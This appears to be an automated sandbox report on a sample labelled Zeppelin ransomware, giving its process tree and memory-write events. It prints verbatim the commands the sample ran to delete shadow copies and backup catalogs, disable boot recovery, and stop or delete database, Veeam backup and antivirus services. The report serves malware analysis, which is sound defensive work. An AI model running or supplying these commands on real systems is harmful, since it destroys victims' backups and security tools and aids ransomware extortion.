Token: SeBackupPrivilege	1852	WMIC.exe
Token: SeRestorePrivilege	1852	WMIC.exe
Token: SeShutdownPrivilege	1852	WMIC.exe
Token: SeDebugPrivilege	1852	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1852	WMIC.exe
Token: SeRemoteShutdownPrivilege	1852	WMIC.exe
Token: SeUndockPrivilege	1852	WMIC.exe
Token: SeManageVolumePrivilege	1852	WMIC.exe
Token: 33	1852	WMIC.exe
Token: 34	1852	WMIC.exe
Token: 35	1852	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2772	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3145cd124db5c8c34e053aea87694baa_zeppelin_JC.execmd.execmd.execmd.exe

description	pid	process	target process
PID 744 wrote to memory of 2216	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2216	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2216	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2216	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2204	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2204	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2204	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2204	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2628	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2628	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2628	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2628	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2224	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2224	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2224	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2224	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2060	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2060	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2060	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2060	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2464	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2464	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2464	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2464	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	cmd.exe
PID 744 wrote to memory of 2852	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
PID 744 wrote to memory of 2852	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
PID 744 wrote to memory of 2852	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
PID 744 wrote to memory of 2852	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
PID 744 wrote to memory of 2916	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
PID 744 wrote to memory of 2916	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
PID 744 wrote to memory of 2916	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
PID 744 wrote to memory of 2916	744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
PID 2216 wrote to memory of 2772	2216	cmd.exe	WMIC.exe
PID 2216 wrote to memory of 2772	2216	cmd.exe	WMIC.exe
PID 2216 wrote to memory of 2772	2216	cmd.exe	WMIC.exe
PID 2216 wrote to memory of 2772	2216	cmd.exe	WMIC.exe
PID 2060 wrote to memory of 2412	2060	cmd.exe	vssadmin.exe
PID 2060 wrote to memory of 2412	2060	cmd.exe	vssadmin.exe
PID 2060 wrote to memory of 2412	2060	cmd.exe	vssadmin.exe
PID 2060 wrote to memory of 2412	2060	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 1852	2464	cmd.exe	WMIC.exe
PID 2464 wrote to memory of 1852	2464	cmd.exe	WMIC.exe
PID 2464 wrote to memory of 1852	2464	cmd.exe	WMIC.exe
PID 2464 wrote to memory of 1852	2464	cmd.exe	WMIC.exe
PID 2464 wrote to memory of 996	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 996	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 996	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 996	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 2804	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 2804	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 2804	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 2804	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 2800	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 2800	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 2800	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 2800	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 936	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 936	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 936	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 936	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 1924	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 1924	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 1924	2464	cmd.exe	vssadmin.exe
PID 2464 wrote to memory of 1924	2464	cmd.exe	vssadmin.exe

C:\Users\Admin\AppData\Local\Temp\3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
"C:\Users\Admin\AppData\Local\Temp\3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe"
1⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:744
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2216
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2772
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
  2⤵
  PID:2204
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  PID:2628
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
  2⤵
  PID:2224
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2060
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2412
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2464
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1852
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:996
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:2804
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe resize shadowstorage /for=D: /on=D: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2800
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:936
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe resize shadowstorage /for=G: /on=G: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1924
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe resize shadowstorage /for=H: /on=H: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:660
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe resize shadowstorage /for=J: /on=J: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1964
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe resize shadowstorage /for=K: /on=K: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1684
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe resize shadowstorage /for=L: /on=L: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2300
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe resize shadowstorage /for=M: /on=M: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1808
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe resize shadowstorage /for=N: /on=N: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:2324
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    WMIC.exe shadowcopy delete /nointeractive
    3⤵
    PID:832
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLFDLauncher$CITRIX
    3⤵
    PID:808
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLFDLauncher$CITRIX start=disabled
    3⤵
    - Launches sc.exe
    PID:2380
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLFDLauncher
    3⤵
    - Launches sc.exe
    PID:2012
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLFDLauncher start=disabled
    3⤵
    - Launches sc.exe
    PID:1088
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$CITRIX
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$CITRIX start=disabled
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLSERVER
    3⤵
    - Launches sc.exe
    PID:2744
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLSERVER start=disabled
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLSERVERAGENT
    3⤵
    - Launches sc.exe
    PID:1996
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLSERVERAGENT start=disabled
    3⤵
    PID:2288
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSOLAP$CITRIX
    3⤵
    - Launches sc.exe
    PID:2168
- - C:\Windows\SysWOW64\sc.exe
    sc config MSOLAP$CITRIX start=disabled
    3⤵
    PID:852
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLBrowser
    3⤵
    PID:1120
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLBrowser start=disabled
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLWriter
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLWriter start=disabled
    3⤵
    PID:832
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$SQLEXPRESS
    3⤵
    - Launches sc.exe
    PID:1752
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$SQLEXPRESS start=disabled
    3⤵
    PID:2672
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLSERVER
    3⤵
    PID:684
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLSERVER start=disabled
    3⤵
    PID:1676
- - C:\Windows\SysWOW64\sc.exe
    sc stop postgresql-9.5
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\sc.exe
    sc config postgresql-9.5 start=disabled
    3⤵
    PID:1288
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsdevcon
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\sc.exe
    sc config fsdevcon start=disabled
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\sc.exe
    sc stop fshoster
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\sc.exe
    sc config fshoster start=disabled
    3⤵
    PID:1304
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsnethoster
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\sc.exe
    sc config fsnethoster start=disabled
    3⤵
    PID:740
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsulhoster
    3⤵
    PID:1344
- - C:\Windows\SysWOW64\sc.exe
    sc config fsulhoster start=disabled
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsulnethoster
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\sc.exe
    sc config fsulnethoster start=disabled
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsulorsp
    3⤵
    PID:2480
- - C:\Windows\SysWOW64\sc.exe
    sc config fsulorsp start=disabled
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsulprothoster
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\sc.exe
    sc config fsulprothoster start=disabled
    3⤵
    - Launches sc.exe
    PID:2640
- - C:\Windows\SysWOW64\sc.exe
    sc stop FSAUS
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\sc.exe
    sc config FSAUS start=disabled
    3⤵
    PID:2276
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsms
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\sc.exe
    sc config fsms start=disabled
    3⤵
    - Enumerates connected drives
    PID:2324
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamAWSSvc
    3⤵
    PID:1272
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamAWSSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:2672
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamAzureSvc
    3⤵
    PID:2908
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamAzureSvc start=disabled
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamEnterpriseManagerSvc
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamEnterpriseManagerSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:1468
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamBackupRESTSvc
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamBackupRESTSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:2480
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamBackupSvc
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamBackupSvc start=disabled
    3⤵
    PID:3000
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamFilesysVssSvc
    3⤵
    - Launches sc.exe
    PID:2040
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamFilesysVssSvc start=disabled
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamBrokerSvc
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamBrokerSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:1860
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamBackupCdpSvc
    3⤵
    PID:1728
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamBackupCdpSvc start=disabled
    3⤵
    PID:1304
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamCloudSvc
    3⤵
    - Launches sc.exe
    PID:1656
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamCloudSvc start=disabled
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamTransportSvc
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamTransportSvc start=disabled
    3⤵
    PID:852
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamDistributionSvc
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamDistributionSvc start=disabled
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamExplorersRecoverySvc
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamExplorersRecoverySvc start=disabled
    3⤵
    - Launches sc.exe
    PID:972
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamGCPSvc
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamGCPSvc start=disabled
    3⤵
    PID:272
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamGuestHelper
    3⤵
    - Launches sc.exe
    PID:1928
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamGuestHelper start=disabled
    3⤵
    - Launches sc.exe
    PID:1700
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamCatalogSvc
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamCatalogSvc start=disabled
    3⤵
    PID:1344
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamHvIntegrationSvc
    3⤵
    PID:2260
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamHvIntegrationSvc start=disabled
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamDeploySvc
    3⤵
    PID:3064
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamDeploySvc start=disabled
    3⤵
    PID:2380
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamMountSvc
    3⤵
    - Launches sc.exe
    PID:2292
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamMountSvc start=disabled
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamRESTSvc
    3⤵
    - Launches sc.exe
    PID:2116
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamRESTSvc start=disabled
    3⤵
    PID:976
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamNFSSvc
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamNFSSvc start=disabled
    3⤵
    PID:2284
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamVssProviderSvc
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamVssProviderSvc start=disabled
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLFDLauncher$CITRIX
    3⤵
    - Launches sc.exe
    PID:2008
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLFDLauncher$CITRIX start= disabled
    3⤵
    PID:1244
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$VEEAMSQL2016
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$VEEAMSQL2016 start=disabled
    3⤵
    - Launches sc.exe
    PID:2172
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLBrowser
    3⤵
    - Launches sc.exe
    PID:2152
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLBrowser start=disabled
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY$VEEAMSQL2016
    3⤵
    - Launches sc.exe
    PID:2020
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY$VEEAMSQL2016 start=disabled
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLWriter
    3⤵
    PID:3008
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLWriter start=disabled
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\sc.exe
    sc stop SageMySQL
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\sc.exe
    sc config SageMySQL start=disabled
    3⤵
    PID:272
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY$VEEAMSQL2016
    3⤵
    PID:304
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY$VEEAMSQL2016 start=disabled
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\sc.exe
    sc stop ReportServer$V4SQLEXPRESS
    3⤵
    PID:1168
- - C:\Windows\SysWOW64\sc.exe
    sc config ReportServer$V4SQLEXPRESS start=disabled
    3⤵
    PID:2596
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY$SDPRO_V4_SQL
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY$SDPRO_V4_SQL start=disabled
    3⤵
    - Launches sc.exe
    PID:580
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$MICROSOFT##WID
    3⤵
    - Launches sc.exe
    PID:2688
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$MICROSOFT##WID start=disabled
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLServerOLAPService
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLServerOLAPService start=disabled
    3⤵
    - Launches sc.exe
    PID:320
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLFDLauncher
    3⤵
    - Launches sc.exe
    PID:2552
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLFDLauncher start=disabled
    3⤵
    PID:1264
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLSERVERAGENT
    3⤵
    PID:1856
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLSERVERAGENT start=disabled
    3⤵
    PID:1780
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLSERVER
    3⤵
    - Launches sc.exe
    PID:3044
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLSERVER start=disabled
    3⤵
    PID:2840
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY
    3⤵
    PID:952
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY start=disabled
    3⤵
    PID:2748
- - C:\Windows\SysWOW64\sc.exe
    sc stop MsDtsServer130
    3⤵
    - Launches sc.exe
    PID:2248
- - C:\Windows\SysWOW64\sc.exe
    sc config MsDtsServer130 start=disabled
    3⤵
    PID:2636
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY$BVMS
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY$BVMS start=disabled
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$SQLEXPRESS2014
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$SQLEXPRESS2014 start=disabled
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLSERVER
    3⤵
    - Launches sc.exe
    PID:1032
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLSERVER start=disabled
    3⤵
    - Launches sc.exe
    PID:1348
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmickvpexchange"
    3⤵
    PID:1376
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicguestinterface"
    3⤵
    PID:740
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicshutdown"
    3⤵
    PID:832
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicheartbeat"
    3⤵
    PID:2260
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicrdv"
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\sc.exe
    sc delete "storflt"
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmictimesync"
    3⤵
    - Launches sc.exe
    PID:2864
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicvss"
    3⤵
    PID:2944
- - C:\Windows\SysWOW64\sc.exe
    sc delete "hvdsvc"
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\sc.exe
    sc delete "nvspwmi"
    3⤵
    PID:2352
- - C:\Windows\SysWOW64\sc.exe
    sc delete "wmms"
    3⤵
    - Launches sc.exe
    PID:1860
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AvgAdminServer"
    3⤵
    PID:2124
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AVG Antivirus"
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\sc.exe
    sc delete "avgAdminClient"
    3⤵
    PID:528
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SAVService"
    3⤵
    - Launches sc.exe
    PID:1996
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SAVAdminService"
    3⤵
    - Launches sc.exe
    PID:680
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos AutoUpdate Service"
    3⤵
    PID:832
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Clean Service"
    3⤵
    PID:300
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Device Control Service"
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Endpoint Defense Service"
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos File Scanner Service"
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Health Service"
    3⤵
    PID:2612
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos MCS Agent"
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos MCS Client"
    3⤵
    PID:1284
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SntpService"
    3⤵
    - Launches sc.exe
    PID:1712
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swc_service"
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_service"
    3⤵
    PID:1960
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos UI"
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_update"
    3⤵
    - Launches sc.exe
    PID:1992
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Web Control Service"
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos System Protection Service"
    3⤵
    PID:612
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Safestore Service"
    3⤵
    - Launches sc.exe
    PID:1144
- - C:\Windows\SysWOW64\sc.exe
    sc delete "hmpalertsvc"
    3⤵
    PID:2412
- - C:\Windows\SysWOW64\sc.exe
    sc delete "RpcEptMapper"
    3⤵
    - Launches sc.exe
    PID:2856
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Endpoint Defense Service"
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SophosFIM"
    3⤵
    PID:2768
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_filter"
    3⤵
    - Launches sc.exe
    PID:2736
- - C:\Windows\SysWOW64\sc.exe
    sc delete "FirebirdGuardianDefaultInstance"
    3⤵
    PID:2124
- - C:\Windows\SysWOW64\sc.exe
    sc delete "FirebirdServerDefaultInstance"
    3⤵
    - Launches sc.exe
    PID:2744
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLFDLauncher"
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLSERVER"
    3⤵
    PID:1632
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLSERVERAGENT"
    3⤵
    PID:2520
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLBrowser"
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLTELEMETRY"
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MsDtsServer130"
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SSISTELEMETRY130"
    3⤵
    PID:2728
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLWriter"
    3⤵
    PID:432
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$VEEAMSQL2012"
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$VEEAMSQL2012"
    3⤵
    PID:976
